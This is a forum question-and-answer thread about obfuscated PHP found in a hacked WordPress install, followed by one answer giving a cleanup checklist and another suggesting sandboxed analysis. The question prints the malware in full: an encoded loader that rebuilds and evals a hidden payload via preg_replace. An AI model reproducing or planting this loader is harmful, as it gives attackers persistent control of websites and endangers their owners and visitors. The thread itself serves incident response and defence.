Can anyone tell me what this code does?

Question

This code showed up in a hacked wordpress install and I couldn't make sense of it. Anyone know what it does exactly?

Sorry for the mess.

    <?php
if (!isset($GLOBALS["\x61\156\x75\156\x61"])) {
    $ua = strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]);
    if ((!strstr($ua, "\x6d\163\x69\145")) and (!strstr($ua, "\x72\166\x3a\61\x31")))
        $GLOBALS["\x61\156\x75\156\x61"] = 1;
}
?><?php
$chhwuiftjh = '%x5c%x7825j:,,Bjg!)%x5c%x7825j:>>1*!%x5c%x7825b:>1<!fmtf!%x1M5]D2P4]D6#<%x5c%x7825G]y6:~:<*9-1-r%x5c%x7825)s%x5c%x7825>%x5c%x782fh%x5c%x7825:<**#]68]y34]68]y33]65]y31]53]y6d]281]y43]]K6]72]K9]78]K5]53]Kc#<%x525ff2!>!bssbz)%x5c%x7824]25%x7825)sutcvt)esp>hmg%x5c%x7825%x5c%x7825)!gj}Z;h!opjudovg}{;#)tutjyf%x5c%x7860op6<*msv%x5c%x78257-MSV,6<*)ujojR%x5eN+#Qi%x5c%x785c1^W%x5-bubE{h%x5c%x7825)sutcvt-#w#)ldbqov>*ofmy%x5c%x7825)c%x7860msvd},;uqpuft%x5c%x78<*#k#)usbut%x5c%x7860cpV%x5c%x787f%x5c%x787f%x5c%x787f%!opjudovg}k~~9{d%x5c%x7825:o0{6~6<tfs%x5c%x7825w6<%x5c%x787fw6*CWtfs%x5c%x7825)7gj6<*id]y4c#<!%x5c%x7825t::!>!%x5c%x7824Ypp3)%x5c%x75!)!gj!<2,*j%x5c%x7825!-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!*72!x5c%x78256<pd%x5c%x7825w6Z6<.3%x5c%x7860hA%x5c25j=tj{fpg)%x5c%x7825%x5c%x7824-%x5c787f;!|!}{;)gj}l;33bq}k;opjudovg}%x5c%x7878;0]=])0#)U!%x5c%x7827{*x5c%x7825tmw)%x5c%x7825tww**WYsboepn)%x5c%x7825bss-%x5vr#%x5c%x785cq%x5c%x7825)ufttj%x5c%x7822)gj6<^#Y#%x5c%x7d]281Ld]245]K2]285]Ke]53Ld]53]Kc]55Ld]55#*<%x5c%%x5c%x7824-%x5c%x7824gps)%x5c%x7825j>1<%x5c%x787827K6<%x5c%x787fw6*2<!gps)%x5c%x7825j>1<%x5c%x7825j=6[%x5c%x7825ww2!>#p#%x5c%x782f#p#%x5]271]y7d]252]y74]256]y39]252]y83]273]y72]282#<!%x5c%x5c%x787f<u%x5c%x7825V%x5c%x7827{ftmfV%x5c%x787f<*X&Z&S{ftmfV%x5:M8]Df#<%x5c%x7825tdz>#L4]275L3]248L3P6L9275ttfsqnpdov{h19275j{hnpd192754]284]364]6]234]342]58]24]31#-%x5c%x7825tdz*Wsfuvso!%x5c%x7825bss%7825)sutcvt)!gj!|!*bubE{h%x5c%x7825)j{hnp3]y76]252]y85]256]y6g]257]y86]267]y74]275]y7:]268]y7f#<!%x5c%x7!|!*1?hmg%x5c%x7825)!gx7825bG9}:}.}-}!#*<%x5c%x7825nfd>%x5c%x7825fdy3qj%x5c%x78257>%x5c%x782272qj%x5c%>b%x5c%x7825Z<#opo#>b%x5c%x7825!*##>>X)!gjZ<#*u%x5c%x7825-#jt0}Z;0]=]0#)2q%x5c%x7825l}S;2-u($n)-1);} @error_reporting(0); preg_replace("%x2%x5c%x7827!hmg%x5c%x7825)!gj!<2,57]38y]47]67y]37]88y]27]28y]#%x5c%x782fr%x5c%x7825%x5c%x782fh%x5c%x7%x785c^>Ew:Qb:Qc:W~!%x5c%x7825z!>-%x5c%x7825o:W%x5c%x7825c:>1<%x5c%x7825b:>1<!gps)%x5c%x78x7878:-!%x5c%x7825tzw%x5c%x782f%x5c%x7824)#P#-#Q#-#B#-#T#j6<.[A%x5c%x7827&6<%x5c%x787fw6*%x5c%x7k!~!<**qp%x5c%x7825!-uyfu%x5c%x7825)3of)fepdof%x5c%x786FUPNFS&d_SFSFGFS%x5c%x7860QUUI&c_UOFHB%x5c%x78257-C)fepmqnjA%x5c%x7827&6<.fmjgA%x5c%x7827doj%x5c%825)54l}%x5c%x7827;%x5c%x%x5c%x7825bT-%x5c%x7825,*e%x5c%x7827,*d%x5c%x7827,*c!*!+A!>!{e%x5c%x7825)!>>%x5c%x7822!ftmbg)!gj25-*.%x5c%x7825)euhA)3of>2bd%x5c%x7825!<5h%x5c%x7824-%x5c%x7824-tusqpt)%x5c%x7825z-#:#*%x5c%x7824-%x5c%x7824!>!tus%c%x782f#o]#%x5c%x782f*)323zbe!-#jt0*?]+^?]_%x5c%x785c}X%x5c%x7827825!<*#}_;#)323ldfid>}&;!osvufs}%x5c%x787f;x7825tjw!>!#]y84]275]y83]248]y83]256]y81]265]y72]254]y76#<%824gvodujpo!%x5c%x78246<*K)ftpmdXA6|7**197-2qj%x5c%x78257-K)udfoopdXA%x5c%x7822)%x5c%x7825t2w>#]y74]273hopmA%x5c%x78273qj%x5c%x78256<*Y%x5c%x7825)fnbozcYufhA%x5c%x78272q825tww!>!%x5c%x782400~:<h%x5c%x7825_t%x5c%x7825:osvufsc%x782f%x5c%x7825z<jg!)%x5c%x7825z>>2*!%x5c%xx5c%x7878:<##:>:h%x5c%x7825:<#64y]552]e7y]#>n%x5c%x7825<#372]58y]472]37y]672]48y]#>s%x5c%x7825<#462]47y]252]1%163%x70%154%x69%164%50%x22%134%x78%62%x35%165%x3a%146%x21%76%x21%50%%x7824*<!~!dsfbuf%x5c%x7860gvodujpo)##-!#~<#%x5c%x782f%x5c%x78c%x7825%x5c%x782f#0#%x5c%x782f*#npd%x5c%x782f#)973:8297f:5297e:56-%x5c%x78bg!osvufs!|ftmf!~<**9.-j%x}+;%x5c%x7825-qp%x5c%x7udovg%x5c%x7822)!gj}1~!<2p%x5c%x7825%x5c%x787f!~!<#fubmgoj{h1:|:*mmvo:>:iuhofm%x5c%x7825:-5ppde:4:x5c%x7860sfqmbdf)%x5c%x7825%x5c3q%x5c%x7825}U;y]}R;2]x7825)7gj6<**2qj%x5c%x7825)hopm3qjA)qj62]y3:]84#-!OVMM*<%x22%51%x29%51%x29%73", NULL); }%x5c%x7825:|:**t%x5c%x7825)m%x5c%x7825=*h%x5c%x7825)m%x5c%x7825):fmji%<Cb*[%x5c%x7825h!>!%x5c%x7825tdz)%x5c%x7825bbT-j%x5c%x78256<^#zsfvr#%x5c%x785cq%x5c%x78257%x5c%x782f7#@#7%x5c%x7825)Rb%x5c%x7825))!gj!<c%x7825w%x5c%x7860%x5cTQcOc%x5c%x782f#00#W~!Ydrr)%x5c%x7825r%x5c%x7878Bsfuvso!sboepn)%x5%x7825)3of:opjudovg<~%x5c%x7824<!%x5c%x*j%x5c%x7825-#1]#-bubE{h%x5c%x78c%x7825)sf%x5c%x7878pmpusut)tpqssutRe%x5c%x7825)Rd%x5cuofuopD#)sfebfI{*w%x5c%x7825)kV%x5c%x7878{**#k#)tutjyf%x5c%x7860%%x7824%x5c%x782f%x5c%x7825kj:-!OVMM*<(<%x5c%x78e%x5c%x156%x75%156%x61"]=1; function fjfgg($n){return chr(ord%x7825w6Z6<.4%x5c%x7860hA%x5c%x7827pd%%x782f7^#iubq#%x5c%x785cq%x5c%x7825%x5c%x782j:!>!#]y3d]51]y35]256]y76]72]y3d]51]y35]274]y4:]82]y3:]62%x5c%x7860SFTV%x5c%x7860QUUI&b%x5c%x7825!|!*)323zbek!~!<b%4<!%x5c%x7825tzw>!#]y76]277]y72]265]y39]274]y85]273]y6g]273]y76D4]273]D6P2L5P6]y6gP7L6M7]D4]275]Dh>EzH,2W%x5c%x7825wN;#-Ez-1H*WCw*[!%x5c%x7825rN}#QwTW%x578b%x5c%x7825ggg!>!#]y81]273]y76]258]y6g]273]ysvufs:~928>>%x5c%x7822:ftmbgd%x5c%x78256|6.7eu{66~6%x7824-%x5c%x7824y4%x5c%zbssb!>!ssbnpe_GMFT%x5c%x7860QIQ&f_UTPI%x5c%x7860QUUI&e_SEEB%x5c%x7860isset($GLOBALS["%x61%156%x75%156%x61"])))) { $GLOBALS["%x61%f%50%x2e%52%x29%57%x65","%x65%166%x61%187f_*#[k2%x5c%x7860{6:!}7;!}6;x5c%x78257;utpI#7>%x5c%x782f7rfs%x5c%x78256<#o]1%x5c%x782fvg+)!gj+{e%x5c%x7825!osvufs4-%x5c%x7824<%x5c%x7825j,,*!|%x5c%x7824-%x5c%x7opo#>b%x5c%x7825!**X)ufttj%x5c%x7822)gj!|!*nbsbq%x5c%x7825)323ldfidc%x7825hIr%x5c%x785c1^-%x5c%x7825r%x5c%x785c2^-%x5c%x7825x5c%x7825)}.;%x5c%x7860UQPMSVD!-id%x5c%x7825)uqpuft%x539*56A:>:8:|:7#6#)tutjyf%x5c%x7860432p%x5c%x7825!|!*!***b%x5c%x7825)sf%x5c%x7878pmpusut!6g]273]y76]271]y7d]252]y74]256#<!%x5c%x78825,3,j%x5c%x7825>j%x5c%x7825!<**3-j%x5c%x782c%x7825tpz!>!#]D6M7]K3#<%%x7860GB)fubfsdXA%x5c%x}88:}334}472%x5c%x7824<!%x5c%x7825mm!>!#]y81]273]y76]258]y]y72]265]y39]271]y83]256]y78]x5c%x7825V<#65,47R25,d7R17,67R37,#%x5c%x782fq%x5c%x7825>U<%x5c%x7827,*b%x5c%x7827)fepdof.)fepdof.%x5c%x782f#@#%x5c%x782fqp%20QUUI7jsv%x5c%x78257UFH#%x5c%x7827rfs%:*r%x5c%x7825:-t%x5cx782f#%x5c%x782f#%x5c%x782f},;#-#256<*17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGTOBSUOSVUFS,825cB%x5c%x7825iN}#-!tussfw)%x5c%x7825c*W%x5c%x782utjm!|!*5!%x5c%x7827!hmg%x5c%x7825)!gj5c%x7827id%x5c%x78256<%x5c%x787fw6*%x5c%x72f!#0#)idubn%x5c%x7860hfsq)!sp!*#ojneb#-*f%x57**^%x5c%x782f%x5c%x78786<C%x5c%x7827&6<*rfs%x5c%x78257-K)f7825o:!>!%x5c%x78242178}52760msvd}+;!>!}%x5c%x7827;!>>>!}_;gvc%x5c%x7825}&;ftmbg}%x5c%x787f;860%x5c%x7825}X;!sp!*#opo#>>}R;msv}.;%x5c%48]32M3]317]445]212]445]43]321]46x5c%x7825%x5c%x787f!<X25j:>1<%x5c%x7825j:=tj{fpg)%x5c%x7825s:*<2)eobs%x5c%x7860un>qp%x5c%x7825!|Z~!<##!>!85cq%x5c%x7825%x5c%x7827Y%x5c%x78256<.msv%x5c%x7860ftsbqA7>78r.985:52985-t.98]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#%x5c%gj!<*2bd%x5c%x7825-#1GO%x5c%x7822#)fepmqyfA>2b%x5c%x7825!<*qp%x5c%x78782f7&6|7**111127-K)ebfsX%x5c%x7827u%x5c%x7825)7fmji%x5c%x77gj6<*QDU%x5c%x7860MPT7-NBFSUT%x5#!>!2p%x5c%x7825Z<^2%x5c%x785c2b%x5c%x782c%x7825r%x5c%x7878B%x5c%x7825h>#]y31]278]y3e]81]K78:56985:61x5c%x7825>5h%x5c%x7825!<*::::::-11111hOh%x5c%x782f#00#W~!%x5c%x7825t2w)##Qtjw)#]82#-#!#-%#%x5c%x782f#M5]DgP5]D6#<%x5c%x7825fdy>#]x78256<%x5c%x787fw6*%x5c%x5c%x7825tmw!>!#]y84]275]y83]273]y76]277#<if((function_exists("%x6f%142%x5f%163%x74%141%x72%164") && (!-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*%x5cx5c%x7878%x5c%x7822l:!}V;8y]#>q%x5c%x7825<#762]67y]562]38y]572]48y]#>m%x5c%x7825:|%x5c%x7825)ftpmdR6<*id%x5c%x%x7824-%x5c%x7824%x5c%x785c%x5c%x7825j^%x5c%x7824-%x5c%x7824tvctusc%x7825epnbss-%x5c%x7825r%x5c%x7878W~!Ypp2)%x5c%x7825z*#cd2bge56+99386c6f+9f5d816:+946:ce44#)7jsv%x5c%x78256<C>^#zsfvr#%x5c%x785cq%x5c%x78257**^#zsf825>j%x5c%x7825!*3!%x5c%x7827!hmg%x5c%x782rrd%x5c%x782f#00;quui#>.%x5c%x7825!<***f%x5c%x782776]271]y7d]252]y74]256#<!%x5c%x7825ggg)(0)%x5c%x782f+*0f(-!#]y76]277x787f_*#fmjgk4%x5c%x786pdfe{h+{d%x5c%x7825)+opjudo5!>!2p%x5c%x7825!*3>?*2b%x5c%x7825)gpf{jt)!hW~%x5c%x7825fdy)##-!#~<%x5c%x7825h00#*<%x5c%x7825nfd)##Qtpz)#]341]8!<12>j%x5c%x7825!|!*#91y]c9y]g2y]#>>*4-1-bubE{h%x5c%x7825c:>%x5c%x7825s:%x5c%x785c%x5c%x7825j:^<!%x5x5c%x78b%x5c%x7825w:!>!%x5c%x7ujs%x5c%x7878X6<#o]o]Y%x7824-%x5c%x7824]y8%x5c%x7824-%x5c%x7824]26%x5c%x782%x785c2^<!Ce*[!%x5c%x7825cIjQe54%x28%151%x6d%160%x6c%157%x64%145%x28%141%x72%162%x61%171%x7825%x5c%x785cSFWSFT%x5c%x7j!<**2-4-bubE{h%x5c%B%x5c%x7825z>!tussfw)%x5c%x7825zW%x5c%x7825dpt%x5c%x7825}K;%x5c%x7860ufldpt}X;%x5c%x7860msvd}R;*msv%q%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#fubf7<&w6<*&7-#o]s]o]s]#)fepmqyf%x5c%x7827*&7-n%x5c%x7825)utjm6<%x5cd!opjudovg!|!**#j{hnpd#)tutjyf%x5c%x7860opjx7860TW~%x5c%x7824<%x5c%x78e%x5c%x78b%x5c%x7825mm)%x5c%x7825%x5c%x5c%x7825%x5c%x7878:!>#]y3g]61]y3f]63]y3:]68]y76#<%x5c%x78e%057ftbc%x5c%x787f!|!*uyfu%x5c%x7827k:!ftmf!}Z;^nbsbq%x5c%x5c%x7824-%x5c%x7824-!%x5c%x7825%x5c%x7824-%x5c%x7824*!|!%x5c-#j0#!%x5c%x782f!**#sfmcnbs+yfeobz+sfwjid78]y33]65]y31]55]y85]82]y76]825)n%x5c%x7825-#+I#)q%x5c%x7825:>:rA%x5c%x7827pd%x5c%x78256<pd%x5c<.2%x5c%x7860hA%x5c%x7827pd%x5c%x78256<C%x5c%x7827p-%x5c%x7824y7%x5c%x7824-%x5c%x7824*<!x5c%x78256~6<%x5c%x787fw)%x5c%x7825%x5c%x7824-%x5c%x7824b!>!%x5c%x7825yy)#}#-#%x55c%x7825c!>!%x5c%x7825i%x5c25%x5c%x7824-%x5c%x7824!>!fyqmpef)#%x5c%x7824*<!%x5c%x7825k87f_*#ujojRk3%x5c%x7860{666~6<&w6<%x5c%x787fw6*CW&)7g8M4P8]37]278]225]241]334]368]322]3]364]6]283]427]36]373P6]36x5c%x785csboe))1%x5c%x782f35.)1%x5c%x782f14+9**-)1%x5c%x782f2986+5c%x7825-bubE{h%x5c%x7825)sutcvt)fubmgoj{hA!osvufs!~<3,j%x5c%x77825)dfyfR%x5c%x7827tfs%x5c%x78x5f%155%x61%160%x28%42%x66%152%x66%147%x67%%x787fw6*CW&)7gj6<*K)ftpmdXA6~6<u%x5c%x78257>%x5c%x25)tpqsut>j%x5c%x7825!*9!%x5c%x7827!hmg%x5c%x7825)!gj!~<ofmy%x5c%x75,67R37,18R#>q%x5c%x7825V<*#fopoV;hojepdoF.42%x2c%163%x74%162%x5f!osvufs}w;*%x5c%x787f!>>%x5c%x7822!pdsdXk5%x5c%x7860{66~6<&w6<%x5c%x787fw6*CW&)7gj6<*doj5c%x7825b:>%x5c%x7825s:%x5c%x785c%x5c%x7825j:.2^,%x5c%x7825b:<!%x5c%xx782f#7e:55946-tr.984:75983:48984:71]K9]77]D4]82c%x7860LDPT7-UFOJ%x5c8246767~6<Cw6<pd%x5c%x7825w6Z6<.5%x5c%x7860h97g:74985-rr.93e:5597f-s.##}C;!>>!}W;utpi}Y;tuofuopd%x5c%x7860ufh%x5c%x7860fmjg}[;lc%x787f<*XAZASV<*w%x5c%x7825)ppde>u%x5c%x7825yy>#]D6]281L1%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6sb%x5c%x7860bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!%x5c%x78%x5c%x7825!-#2#%x5c%x782f#%x5c%x7825#%x5]73]83]238M7]381]211M5]67]452]88]5]825r%x5c%x7878<~!!%x5c%x7825s:N}#248]y83]256]y81]265]y72]254]y76]61]y337825z>3<!fmtf!%x5c%x7825z>2<!%x5c%x7825ww2)%x5c%x7825w%x5c%judovg)!gj!|!*msv%x5c%x7825)}k~~~<ftm#16,47R57,27R66,#%x5c%x782fq%x5c%x7825>2q%x5c%x7825<#g6R8},;osvufs}%x5c%x7827;mnui}&;zepc}A;~!}%x5c%x|:**#ppde#)tutjyf%x5c%x78604%x5c%x78223}!+!<+{e%x5c%x7825+*!*+fe/(.*)/epreg_replacesoxyccylmv';
$tixpyrhtzz = explode(chr((137 - 93)), '6698,61,4592,60,3997,54,1701,48,4652,39,7700,59,8963,43,9167,22,2967,69,8122,60,7565,30,9415,44,8405,31,4051,38,708,46,9600,36,8436,51,4475,23,7950,64,9006,51,6309,59,5802,38,7595,23,4721,58,5463,39,8524,24,2612,58,6368,33,9394,21,5230,23,1061,20,1576,34,3372,38,2692,67,3577,62,4089,44,7089,55,910,56,6112,59,7907,43,9226,51,2128,59,6631,25,7304,23,535,59,6902,28,8932,31,5555,51,316,33,5694,42,8691,53,1996,39,4691,30,9484,58,7850,57,4977,54,424,28,5867,65,9189,37,266,50,9904,37,3172,26,8869,63,7144,42,639,69,1749,32,3792,32,9057,67,5160,45,371,53,5656,38,1508,22,7787,20,236,30,7465,53,1404,41,8014,43,3221,51,6401,41,7354,43,6240,69,2308,45,3098,47,7186,50,2235,29,5398,65,6502,37,6070,42,5067,52,8300,41,9636,63,5736,45,3824,54,3639,26,7050,39,4522,70,2090,38,4190,58,6007,22,1610,45,4853,67,2035,55,8182,57,7759,28,5932,42,5522,33,3198,23,2187,25,2487,44,507,28,4447,28,5031,36,1306,32,3272,47,10042,64,7327,27,4779,27,2264,44,452,55,1202,64,9542,36,5340,58,9941,57,9124,43,3878,65,6820,25,3350,22,9998,44,790,66,1655,46,9699,40,2423,64,4248,63,1150,52,2531,59,6656,42,2670,22,1445,63,2759,54,86,59,1781,68,8369,36,3460,70,2858,58,2916,51,6845,57,5502,20,3753,39,5840,27,5253,58,5119,41,208,28,8239,61,6930,66,8548,57,2353,70,3319,31,4498,24,7618,52,4806,47,2590,22,8487,37,1014,47,754,36,3036,62,8632,59,4133,57,594,45,5606,50,349,22,8605,27,7670,30,3687,66,6996,54,7807,43,4345,56,4920,57,6539,52,856,54,6442,60,9459,25,3145,27,6171,69,9346,48,182,26,5205,25,9578,22,6591,40,4311,34,1266,40,59,27,966,48,1530,46,3530,47,2212,23,7397,68,8744,60,9739,35,5974,33,1338,66,8804,65,5781,21,9774,33,1882,57,6029,41,0,59,9277,69,7518,47,3665,22,1849,33,1081,69,2813,45,9845,59,8057,65,1939,57,6759,61,3943,54,4401,46,7236,68,5311,29,9807,38,145,37,8341,28,3410,50');
$bcidkfumgh = substr($chhwuiftjh, (53382 - 43276), (34 - 27));
if (!function_exists('llanineuke')) {
    function llanineuke($yxidvbxjao, $ekpdfiiyby)
    {
        $fgjggfpxoa = NULL;
        for ($oekjgwdylc = 0; $oekjgwdylc < (sizeof($yxidvbxjao) / 2); $oekjgwdylc++) {
            $fgjggfpxoa .= substr($ekpdfiiyby, $yxidvbxjao[($oekjgwdylc * 2)], $yxidvbxjao[($oekjgwdylc * 2) + 1]);
        }
        return $fgjggfpxoa;
    }
    ;
}
$ijrkaiuogd = "\x20\57\x2a\40\x6b\167\x69\171\x67\165\x61\145\x67\156\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x32\62\x32\55\x31\70\x35\51\x29\54\x20\143\x68\162\x28\50\x35\60\x30\55\x34\60\x38\51\x29\54\x20\154\x6c\141\x6e\151\x6e\145\x75\153\x65\50\x24\164\x69\170\x70\171\x72\150\x74\172\x7a\54\x24\143\x68\150\x77\165\x69\146\x74\152\x68\51\x29\51\x3b\40\x2f\52\x20\151\x76\166\x63\167\x66\163\x6f\143\x75\40\x2a\57\x20";
$nrgfsqntyb = substr($chhwuiftjh, (31329 - 21216), (75 - 63));
$nrgfsqntyb($bcidkfumgh, $ijrkaiuogd, NULL);
$nrgfsqntyb = $ijrkaiuogd;
$nrgfsqntyb = (516 - 395);
$chhwuiftjh = $nrgfsqntyb - 1;
?>

Answer 1

Don't worry about what it does. You got hacked, and the longer you wait, the more damage this can cause. Here's what you do:

• Inventory your Wordpress installation. Make note of every plugin and theme you're using, and any settings they might have
• Make a local backup by downloading your entire Wordpress installation
• Export your database locally. You can do this through MySQL Workbench, SequelPro, or (shudder) PHPMyAdmin
• Delete Wordpress (everything except wp-content)
• Delete all Plugins
• Delete all Themes
• If this is a custom theme, go through each file in your local copy and look for any suspicious code. If you have PHPStorm, you can run Find in Path on your active theme directory and search recursively for "isset($GLOBALS" (without quotes). If your custom theme extends a parent theme, repeat this process for the parent theme or re-download the parent theme.
• Check all remaining directories for loose PHP files that don't exist within a Plugin or Theme context. This includes your Uploads directory, and its index.php file. Open each PHP file you find and check its content for suspicious code. Most - if not all - of these files should just have a single comment reading //silence is golden
• Reinstall the latest version of Wordpress
• Reinstall, activate, and configure all of your plugins
• Replace your active theme(s) with your local cleaned versions, or - if possible - reinstall them from their dedicated repositories
• Check your Users section. Delete any users you don't recognize
• Refresh your .htaccess file by re-saving your Permalinks settings.
• Change your Dashboard, Database User, Root Database User, and FTP passwords. If you have SSH credentials, you should probably update your SSH password there as well
• DO NOT USE ROOT AS YOUR DATABASE USER. Change this if you are, and slap yourself for doing it in the first place.
• Install Wordfence and pray you don't get hacked again

If you make a mistake somewhere, you can always re-import your database. It is not recommended to move your infected backup files back to your server.

That's about everything I can think of off the top of my head. A surefire way to not get hacked like this again is to stop using Wordpress altogether

Answer 2

It's very simple.

1. Spin up a sand-boxed Lamp stack
2. Run the code in a debug session
3. Inspect output line by line

That will give you some insights. But I can tell you one thing though. This code is dependent on a key to work.